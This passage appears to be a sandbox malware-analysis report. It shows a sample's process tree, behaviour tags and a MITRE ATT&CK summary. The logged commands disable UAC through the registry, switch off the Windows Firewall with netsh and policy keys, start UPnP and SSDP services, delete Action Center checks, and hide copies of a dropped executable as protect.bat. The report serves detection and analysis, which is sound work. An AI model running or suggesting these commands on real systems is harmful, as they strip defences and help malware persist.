    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f | PID:2044
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f | PID:636
        - UAC bypass
        - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto | PID:4784
      C:\Windows\SysWOW64\sc.exe | sc config upnphost start= auto | PID:4444
        - Launches sc.exe
        - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto | PID:2300
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\sc.exe | sc config SSDPSRV start= auto | PID:3152
        - Launches sc.exe
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c sc config browser start= auto | PID:224
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\sc.exe | sc config browser start= auto | PID:4680
        - Launches sc.exe
        - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c net start upnphost | PID:2600
      C:\Windows\SysWOW64\net.exe | net start upnphost | PID:3148
        C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 start upnphost | PID:3080
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c net start SSDPSRV | PID:5076
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\net.exe | net start SSDPSRV | PID:4040
        C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 start SSDPSRV | PID:4592
          - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c net start browser | PID:4536
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\net.exe | net start browser | PID:1332
        C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 start browser | PID:3980
          - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off | PID:2384
      C:\Windows\SysWOW64\netsh.exe | netsh advfirewall set currentprofile state off | PID:1448
        - Modifies Windows Firewall
        - Event Triggered Execution: Netsh Helper DLL
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | PID:1724
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | PID:1524
        - Modifies firewall policy service
        - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | PID:1892
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | PID:3748
        - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | PID:2264
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | PID:2732
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off | PID:700
      C:\Windows\SysWOW64\netsh.exe | netsh advfirewall set currentprofile state off | PID:4440
        - Modifies Windows Firewall
        - Event Triggered Execution: Netsh Helper DLL
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f | PID:2712
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f | PID:60
        - System Location Discovery: System Language Discovery
        - Modifies Internet Explorer settings
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f | PID:1840
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f | PID:4680
        - System Location Discovery: System Language Discovery
        - Modifies Internet Explorer settings
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f | PID:1200
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f | PID:2536
        - Modifies Internet Explorer settings
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat" | PID:1836
      - System Location Discovery: System Language Discovery
      C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:4608
      C:\Windows\SysWOW64\attrib.exe | attrib -R -H "F:\protect.bat" | PID:4764
        - Views/modifies file attributes
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f | PID:4688
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f | PID:3692
        - Modifies Internet Explorer settings
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat" | PID:3540
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\attrib.exe | attrib -R -H "C:\protect.bat" | PID:3288
        - System Location Discovery: System Language Discovery
        - Views/modifies file attributes
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f | PID:556
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f | PID:1524
        - Modifies Internet Explorer settings
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f | PID:3176
      C:\Windows\SysWOW64\reg.exe | reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f | PID:3940
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f | PID:3392
      C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:3152
      C:\Windows\SysWOW64\reg.exe | reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f | PID:2848
    C:\Program Files\Internet Explorer\iexplore.exe | "C:\Program Files\Internet Explorer\iexplore.exe" | PID:2296
      - Modifies Internet Explorer settings
    C:\Windows\SysWOW64\rundll32.exe | "C:\Windows\System32\rundll32.exe" | PID:3984
      - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\daemon.exe" "C:\protect.bat" | PID:4056
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\daemon.exe" "F:\protect.bat" | PID:4592
      - System Location Discovery: System Language Discovery
      C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:3748
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat" | PID:532
      - System Location Discovery: System Language Discovery
      C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:1448
      C:\Windows\SysWOW64\attrib.exe | attrib +R +H "C:\protect.bat" | PID:2732
        - Sets file to hidden
        - Views/modifies file attributes
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat" | PID:324
      C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:1332
      C:\Windows\SysWOW64\attrib.exe | attrib +R +H "F:\protect.bat" | PID:1724
        - Sets file to hidden
        - System Location Discovery: System Language Discovery
        - Views/modifies file attributes
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects" | PID:4064
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f | PID:2480
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f | PID:2152
      - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f | PID:3096
    C:\Windows\SysWOW64\reg.exe | reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f | PID:116
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f | PID:1892
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f | PID:4988
      - UAC bypass
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto | PID:624
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\sc.exe | sc config upnphost start= auto | PID:3388
      - Launches sc.exe
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto | PID:5076
    C:\Windows\SysWOW64\sc.exe | sc config SSDPSRV start= auto | PID:728
      - Launches sc.exe
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c sc config browser start= auto | PID:4460
    C:\Windows\SysWOW64\sc.exe | sc config browser start= auto | PID:4236
      - Launches sc.exe
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c net start upnphost | PID:3816
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\net.exe | net start upnphost | PID:2600
      C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 start upnphost | PID:2324
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c net start SSDPSRV | PID:3968
    C:\Windows\SysWOW64\net.exe | net start SSDPSRV | PID:2848
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 start SSDPSRV | PID:4580
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c net start browser | PID:4476
    C:\Windows\SysWOW64\net.exe | net start browser | PID:4192
      C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 start browser | PID:1420
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off | PID:1508
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe | netsh advfirewall set currentprofile state off | PID:3652
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | PID:856
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | PID:808
      - Modifies firewall policy service
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | PID:4372
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | PID:4576
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | PID:1492
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | PID:2148
      - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off | PID:388
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\netsh.exe | netsh advfirewall set currentprofile state off | PID:4164
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f | PID:4044
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f | PID:1824
      - System Location Discovery: System Language Discovery
      - Modifies Internet Explorer settings
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f | PID:4688
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f | PID:1360
      - Modifies Internet Explorer settings
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f | PID:2260
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f | PID:1404
      - System Location Discovery: System Language Discovery
      - Modifies Internet Explorer settings
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f | PID:3972
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f | PID:3140
      - Modifies Internet Explorer settings
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f | PID:3032
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f | PID:2992
      - Modifies Internet Explorer settings
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f | PID:3000
    C:\Windows\SysWOW64\reg.exe | reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f | PID:2964
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f | PID:3532
    C:\Windows\SysWOW64\reg.exe | reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f | PID:532
  C:\Program Files\Internet Explorer\iexplore.exe | "C:\Program Files\Internet Explorer\iexplore.exe" | PID:3908
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3908 CREDAT:17410 /prefetch:2 | PID: (not captured; report truncated here)
      - Loads dropped DLL
      - Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:516
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3908 CREDAT:17416 /prefetch:23⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:548
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1524
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵PID:4392
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Hide Artifacts (2)
  - Hidden Files and Directories (2)
- Impair Defenses (3)
  - Disable or Modify System Firewall (2)
  - Disable or Modify Tools (1)
- Indicator Removal (1)
  - File Deletion (1)
- Modify Registry (4)
Downloads